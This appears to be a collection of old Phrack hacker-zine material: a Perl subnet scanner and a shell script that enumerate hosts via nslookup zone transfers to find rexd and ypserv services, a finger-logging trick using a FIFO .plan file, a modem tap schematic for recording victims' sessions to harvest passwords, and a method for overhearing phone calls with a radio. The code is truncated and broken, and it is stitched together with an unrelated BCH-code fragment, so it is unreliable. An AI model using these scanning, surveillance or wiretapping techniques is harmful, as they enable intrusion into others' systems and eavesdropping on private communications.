    kaux = 1;
    for (ii=0; ii<noterms; ii++)
      for (jj=0; jj<size[min[ii]]; jj++)
        zeros[kaux] = cycle[min[ii]][jj];
#ifdef DEBUG
printf("%d ", zeros[kaux]);
    k = n - rdncy;
    printf("This is a (%d, %d, %d) binary BCH code\n", n, k, d);


#!/bin/perl -s
#   Scan a subnet for valid hosts; if given hostname, will look at the
# 255 possible hosts on that net.  Report if host is running rexd or
# ypserv.
#  Usage:  scan n.n.n.n

# mine, by default
$default = "130.80.26";

$| = 1;

if ($v) { $verbose = 1; }

if ($#ARGV == -1) { $root = $default; }
else { $root = $ARGV[0]; }

# ip address
if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
        ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
        ($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
        $root = "$one.$two.$three";
        if ($root eq "..") { die "Can't figure out what to scan...\n"; }

print "Subnet $root:\n" if $verbose;
for $i (01..255) {
        print "Trying $root.$i\t=> " if $verbose;

#  Do the work
sub resolve {

local($name) = @_;

# ip address
if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
        ($a,$b,$c,$d) = split(/\./, $name);
        @ip = ($a,$b,$c,$d);
        ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
else {
        ($name, $aliases, $type, $len, @ip) = gethostbyname($name);
        ($a,$b,$c,$d) = unpack('C4',$ip[0]);

if ($name && @ip) {
        print "$a.$b.$c.$d\t$name\n";
        system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
unning ypserv.\"\nfi\nfi");
else { print "unable to resolve address\n" if $verbose; }


sub AF_INET {2;}


#rpc.chk 1.0
# Make sure you have got a newer version of Bourne Shell (SVR2 or newer)
# that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS)
# or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to
# change the magic number, indicating the type of executable Bourne Shell.
# The script obtains via nslookup utility a list of hostnames from a nameserver
# and checks every entry of the list for active rexd procedures as well as
# ypserver procedures. The output is a list of the sites that run those
# daemons and are insecure.
# -yo.

umask 022
PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH

# Function collects a list of sites
# from a nameserver. Make sure you've got the nslookup utility.
get_list() {
echo set type=ns
echo $domainname
) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$  2>/dev/null
if [ ! -s .tmp$$ ]; then
echo "No such domain" >&2
echo "Nothing to scan" >&2
exit 1
for serv in `cat .tmp$$`;do
echo server $serv
echo ls  $domainname
) | nslookup > .file$$ 2>/dev/null
lines=`cat .file$$ | wc -l`
tail -`expr $lines  - 7` .file$$  | cut -d" " -f2 > .file.tmp # .file
sed -e "s/$/.$domainname/"  .file.tmp > .hosts$$
rm -rf .file* .tmp$$
sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$
tr 'A-Z' 'a-z' <HOSTS$$ |sort|uniq -q > HOSTS.$domainname;rm -rf HOSTS$$

# Function

for entry in `cat HOSTS.$domainname`; do
rpcinfo -t $entry ypserv >/dev/null  && echo $entry runs YPSERV ||  exit 1 # Error!
) >> .log  2>/dev/null
rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD ||  exit 1 # Error !
 ) >> .log  2>/dev/null

# Main

if [ "$domainname" = '' ];  then
echo "Usage $0 domainname" >&2
exit 1
echo "Checking $domainname domain" > .log
echo "*****************************" >> .log
echo "Totally `cat HOSTS.$domainname | wc -l` sites  to scan" >> .log
echo "******************************" >> .log
echo "started at `date`" >> .log
echo "******************************" >> .log
echo "******************************" >> .log
echo "finished at `date`"  >> .log


                         The Ultimate Finger/Mail Hack



                              (a.k.a. WinterHawk)

This program will keep a log of who fingers you on your local host and tell
you when the finger was performed. As an added tease, it will send email to
the person doing the fingering telling them that you know who they are and
you know when they fingered you, even when you are not logged on.

Easy to follow steps:

[This is a comment]


[Get to your home directory]
% cd

[Make a file called .mailscript and include the following source code]
% cat .mailscript
SUCKER=`ps -fau | grep 'finger $MYNAME' | grep -v 'grep' | awk '{print $1}'`
echo "$SUCKER fingered you on `date`" | cat >> $HOME/.fingerlog
echo "$MYNAME knows that you fingered him on `date`" | mail -s 'Sucker!' $SUCKER

[On some systems, the `u' flag is not necessary for the `ps' command]
[On most systems, you will not have to (re)declare the $HOME variable]
[If you do not want the fingerer to receive email, remove the last line]
[You may wish to hard code your account name, rather than using the variable]

[Make a file called fingerLog.c and include the following source code]
% cat fingerLog.c
#include <stdio.h>
#include <sys/file.h>
   int x, pipeHandle, planHandle;
   char * pipeFile = "/your/full/home/path/goes/here/.plan";
   char * planFile = "/your/full/home/path/goes/here/.realplan";
   char buf[1024];
      system("sh /your/full/home/path/goes/here/.mailscript");

[Compile the fingerLog.c program]
% cc fingerLog.c -o fingerLog

[You may want to use a more inconspicuous name for the executable file]

[Move you .plan file to .realplan]
% mv .plan .realplan

[Make a piped FIFO .plan file]
% mknod .plan p

[Allow people to view your bogus .plan file]
% chmod 755 .plan

[Run fingerLog in the background]
% nohup fingerLog > /dev/null &

[Optional clean up]
% rm fingerLog.c

PROBLEMS: On some machines, the [ps -fau] option will not reveal what account
          a person is actually fingering. In this case, you can remove all
          instances of the $MYNAME variable from the [.mailscript] file.
          However, it is entirely possible that two people may be performing a
          finger at the same time and the script may log the wrong one. If you
          do have to omit the $MYNAME variable, I strongly suggest that you
          also remove the email option. And, you might as well change the [ps]
          command to a simple [w], like so:

          SUCKER=`w | grep 'finger' | grep -v 'grep' | awk '{print $1}'`

          Also, if the system you are on is bogged down with a lot of
          processes, the script may not find the fingerer before the process
          is terminated, thus logging the time without an appropriate account
          name, and not sending the email. So far, there has only been one
          system where I could only use the program to log the times that I
          had been fingered, no account names and no email :(

That's It! Of course, this is not a perfect bug free program. It should run
all the time [even when you are not logged on] so you only need to run it
once. If it does quit for some reason [like when the sysop kills it], you can
simply restart it. For those of you privileged enough to be using Korn shell,
you can add the following code to your [.profile] that will check to see if
fingerLog is running whenever you log in. If it isn't, it will restart it for
you. I'm sure that this can be modified to work with Bourne and C shell (if it
doesn't already), but I'll leave that up to you.

ps x | grep 'fingerLog' | grep -v 'grep' > /dev/null
if (( $? != 0 )); then nohup fingerLog > /dev/null &

Let me say this one more time so that there is no confusion, "This only works
on your LOCAL host!!!" People who finger you from a remote host will see your
[.realplan] file, just like everyone else, but they will *NOT* receive the
email. It will appear in your .fingerlog as an empty account name. If and when
someone does revise this to work with remote hosts (most likely using the
netstat command), please email me a copy at:


As a matter of fact, there is a lot of room for improvement. If *ANYONE* makes
*ANY* revisions, please have the courtesy to email me a copy and explain what
changes you have made. Thanks. Enjoy!

Assembly: WinterHawk bows humbly to Cat and Fuzz.


                     | Building A Modem Tap |
                     | by: phigan           |

        Many of you have probably heard of, seen, or maybe even built a
phone tap. Not a very difficult device to make. I got the idea of making
a modem tap from a computer underground book that I saw over at my local
Spy Headquarters (I'm not sure if this is a store that is only here in
602 or not but its got shitloads of spy equipment such as video
surveillance, fake ids, useful literature, fake bombs, very small bugs,
etc.).  First of all, here is the schematic for making a phone tap to
record to cassette.

1) RCA-type jack
   to tape recorder
   mic input
1) 10k(p)ohm : 20k(s) ohm
1) .005 mfd capacitor

                                      To line
+--------------------------+          |     |
|                          |          |     |
(+-----------+             |          |     |
RCA          | Transformer |          |     |
jack         +^^^^^^^^^^^^^+          |     |
             +-------------+          |     |
             |             |          |     |
             |             +----------------+
             |                        |     |
             +----------||------------+     |
                     .005 mfd         |     |

        The main purpose for a modem tap such as this is to set it up at
someone's house or maybe an office building that you know dials out with
modems and you can record all the keystrokes that have been entered.
With this next schematic, you can simply play the cassette back through
your modem and easily print out the entire session having logged
passwords and so on. Good way of getting CBI accounts also.

1) RCA type jack
   from tape recorder
   ext. speaker
1) 100 Ohm restistor
1) bell-type phone jack (@)


    +-------+       ____________________   RCA jack
----| Modem | @----<_________/\/\/\_____>(+
    +-------+ phone          100 Ohm

        When you have a recording of your victim's session, simply fire
up your terminal program and treat it as you would any other modem
connection. If you are smart enough, you may even be able to combine
these two and make an acoustic modem module for a regular laptop modem
(hint hint payphones hint hint). I have seen this done in a mail-order
It said that the acoustic module could handle 9600 baud and if you have
enough rubber cups (like they did on their model) then you will
have absolutely no line noise. Anyway, if you have any problems, feel
free to email me at 15660@ef.gc.maricopa.edu or you may find me on IRC
as phigan on channels #phreak, #hack, or sometimes #c-64.

                     (o o)
| PHiGAN/6o2              IBM/Amiga/8-Bit     |
| ANSi/VGA/Coding         Member: NWPAC       |
| Hi-Res/8-Bit/Musix      SysOp:              |
| 15660@ef.gc.maricopa.edu -The PhAcS Machine |


                  Phone Tapping with a personal stereo !!!
                             brought to you by


        Here in the UK, we have a reasonably secure phone system, mainly
because the whole system is run by our beloved phone company British
Telecom, even the private phone companies have to rent their lines off BT.

        BUT, due to something or other I don't entirely understand here's
how to listen in to phone conversations with a personal stereo.

        I was lying in bed one night trying desperately to read my book,
while everyone else was making enough noise to wake the dead. So, I
thought, I'll put personal stereo radio onto some radio crackle to cut out
everything else. I was happily reading for a while when suddenly the radio
crackle was interrupted by 'ring ring, ring ring, 'ello Jon, going into
work tomorrow ? Good, how's the wife.... etc etc' Fuck me ! A telephone
conversation. After a bit of investigating I discovered my bed lies next
to where the telephone line goes thru the wall.

        What I did was to tune the radio into an AM frequency, as far to
the right (past 1600 kHz) as possible. This works on my personal stereo, a
Sharp, model JC-512(GY), my clock radio and my mates pocket radio, but not
on some other radios we've tried. It picks up local telephone calls (if
there are any strong enough to be picked up) when the radio is put near a
telephone socket or line (the closer the better). Computer monitors and
TV's give loads of interference (try putting your the radio near one when
tuned to listen for phones) so keep away from them.

        You can't choose what calls to listen in on, and some may be
blurred beyond recognition, while others are crystal clear. Also,
strangely enough if someone in the house uses the phone while your
listening to conversations it doesn't effect it in any way, and you can't
hear the call currently on the line.

        Not being an electronics hacker I can only assume it is to do with
the frequency of radio waves given off by electrical devices after a
certain distance travelled. But then again maybe not.

        This may work in other places apart from the UK as well, give it a
try !
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2021, Phrack Magazine.